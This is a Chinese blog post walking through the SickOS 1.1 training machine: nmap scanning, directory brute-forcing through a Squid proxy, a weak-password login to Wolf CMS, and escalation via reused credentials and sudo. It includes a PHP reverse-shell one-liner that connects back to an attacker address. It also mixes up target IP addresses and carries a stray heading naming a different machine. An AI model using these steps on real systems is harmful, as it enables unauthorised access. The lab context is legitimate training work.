【学渗透靶机——sickOS1.1】

已于 2023-06-21 13:59:28 修改
阅读量87 收藏
点赞数
分类专栏: web渗透 靶机学习 文章标签: 安全 web安全
于 2023-04-12 16:45:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/130059687
版权

学渗透靶机——W1R3S

环境搭建

攻击机: kali
靶机:sickOS1.1

信息收集

服务器信息收集:

主机ip发现

nmap -sn 192.168.241.0/24

扫描结果如下:
在这里插入图片描述
服务器ip为:192.168.241.150

扫描主机开放的端口

nmap --min-rate 10000 -p- 192.168.241.150

在这里插入图片描述

扫描主机开放的端口详细信息

nmap -sT -sV -O -p22,3128,8080  192.168.241.150

在这里插入图片描述

nmap进行漏洞探测

 nmap --script=vuln -p22,3128,8080 192.168.241.150

在这里插入图片描述

总结:

从服务器信息收集看 这台靶机的ip为192.168.241.150 ,服务器开放了22,3128、8080
使用nmap扫描漏洞也么什么发现,。对于开放的端口我们优先8080和3128

web 信息收集

从主机探测到的服务看8080 是web 服务,而squid-http 是个代理,

访问http://192.168.47.157:3128, 页面爆出squid及其版本号3.1.19, 通过搜索引擎得知, squid是一个代理服务器和Web缓存服务器, 主要用于Unix一类系统使用
使用dirsearch对代理服务器http://192.168.47.157:3128进行爆破, 没有结果
在这里插入图片描述
既然192.168.47.157:3128是一个代理服务器, 那就尝试用它来作为目录爆破工具的代理参数来对http://192.168.47.157进行扫描, 扫描结果如下图所示
在这里插入图片描述
发现robots.txt 访问查看:
在这里插入图片描述
很幸运发现wolfcms目录,访问查看,发现类似博客的 既然是博客网站, 那么肯定有编辑文章的接口, 通常要使用此接口需要网站管理员权限, 那么接下来就要找到网站的后台地址,而且页面中发现是wolfcms 版本为0.8.2
在这里插入图片描述

kali 使用searchploit搜索wolfcms 框架
在这里插入图片描述

下载读取改文件
在这里插入图片描述
尝试访问成功如下图:
在这里插入图片描述
通过搜素引擎搜索wolfcms 后台管理登陆的默认账号密码
在这里插入图片描述

尝试访问失败、试试弱口令admin admin 登录成功

在这里插入图片描述
访问页面查看发现home[page、articles、RSS Feed、footer等都是可写的php 页面,直接反弹shell
``

<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.241.140/443 0>&1'") ?>

``
写入,保存,监听,访问,一气呵成。获得shell。
在这里插入图片描述

提权:

通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码
在这里插入图片描述
登录到mysql,并没有发什么有用的信息。那这个密码还有没有其他的用处呢。这里看一下系统有哪些用户。
发现/etc/passwd 文件可以读取,,通过这是账号和发现的密码匹配进行爆破

在这里插入图片描述
爆破成功 登录sickos ,发现可以通过sudo 提权

在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali与靶机网络配置问题
leo788的博客
01-04 3159
前提:kali宿主机和靶机都使用的NAT网络配置,然而无论是arp-scan还是nmap还是netdiscover都找不到靶机ip,正常情况下可以找到。
vulnhub靶机渗透 sick0s1.1
RestoreJustice的博客
03-19 211
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面描时已经到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权。/test.php,使用蚁剑连接,记得挂上靶机的3128代理。
渗透靶机时无法描到靶机ip
捣蛋鬼
03-27 1440
解决方法: 重启靶机(Host+R),重启靶机过程中按住向上键 点击键盘e,找到内核加载配置行,将其修改为单用户启动模式: Ctrl+x进入单用户模式(root),输入ip a命令查看网卡设备名称: 查看网络配置文件中的网卡名称:RedHat Linux----vi /etc/network/interfaces UBUNTU----vi /etc/netplan/00-installer-config.yaml 将配置文件中的网卡名称修改为当前的正确名称,并确定DHCP配置启动: # This is
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1060
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
vulhub渗透测试靶机习1
08-08
渗透测试靶机习】 渗透测试靶机安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让习者通过查找和利用...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
OWASP靶机安全习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 513
一站式云安全托管限时试用 开启全能高效攻防
客户端与服务器通讯详解(5):安全威胁与应对策略
贝格前端工场的博客
07-23 294
在进行客户端与服务器通讯的时候,要时刻防范安全威胁,后端有一句名言“永远不要相信用户在前端的输入”,就是说客户端和服务器之间通讯,必须有严密的规则。
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 650
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1123
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
自媒体创作、小说推文等网赚项目安全吗?网络兼职需要注意什么?
2401_86131344的博客
07-23 183
综上所述,自媒体创作和小说推文等网赚项目在遵守相关规定和采取正确操作方式的前提下是安全的。- 在自媒体创作和小说推文的过程中,要严格遵守平台的相关规定和规则,避免违规行为导致账号被封禁或收益被扣除。自媒体创作和小说推文等网赚项目本身**可以**是安全的,但前提是要采取正确的操作方式和遵守相关规定。- 对于小说推文,要选择正规的小说平台进行合作,例如知乎、起点、飞卢等。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 1206
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 667
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
防火墙内容安全综合实验
m0_74256660的博客
07-19 466
2,我们需要针对办公区用户进行上网行为管理,要求进行URL过滤,要求在上班时间仅能访问教育/科研类,搜索/门户类网站,以及一个www.example.com/working相关URL都可以访问。1,假设内网用户需要通过外网的web服务器和pop3邮件服务器下载文件和邮件,内网的FTP服务器也需要接受外网用户上传的文件。针对该场景进行防病毒的防护。3,通过DNS过滤,实现办公区仅能使用一个域名访问公网发HTTP服务器,另一个不行。
构建稳固与安全的网络环境:从微软蓝屏事件看软件更新流程与应急响应
最新发布
CSDNsunyue的博客
07-23 497
近日,由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅让科技领域为之震动,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件源于美国电脑安全技术公司“众击”的一次带有“缺陷”的软件更新,其影响范围之广、程度之深,令人震惊。本文将从软件更新流程中的风险管理和质量控制机制、预防类似大规模故障的最佳方案或应急响应对策,以及跨领域连锁反应的行业影响三个方向,深入探讨如何构建更加稳固和安全的网络环境。
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值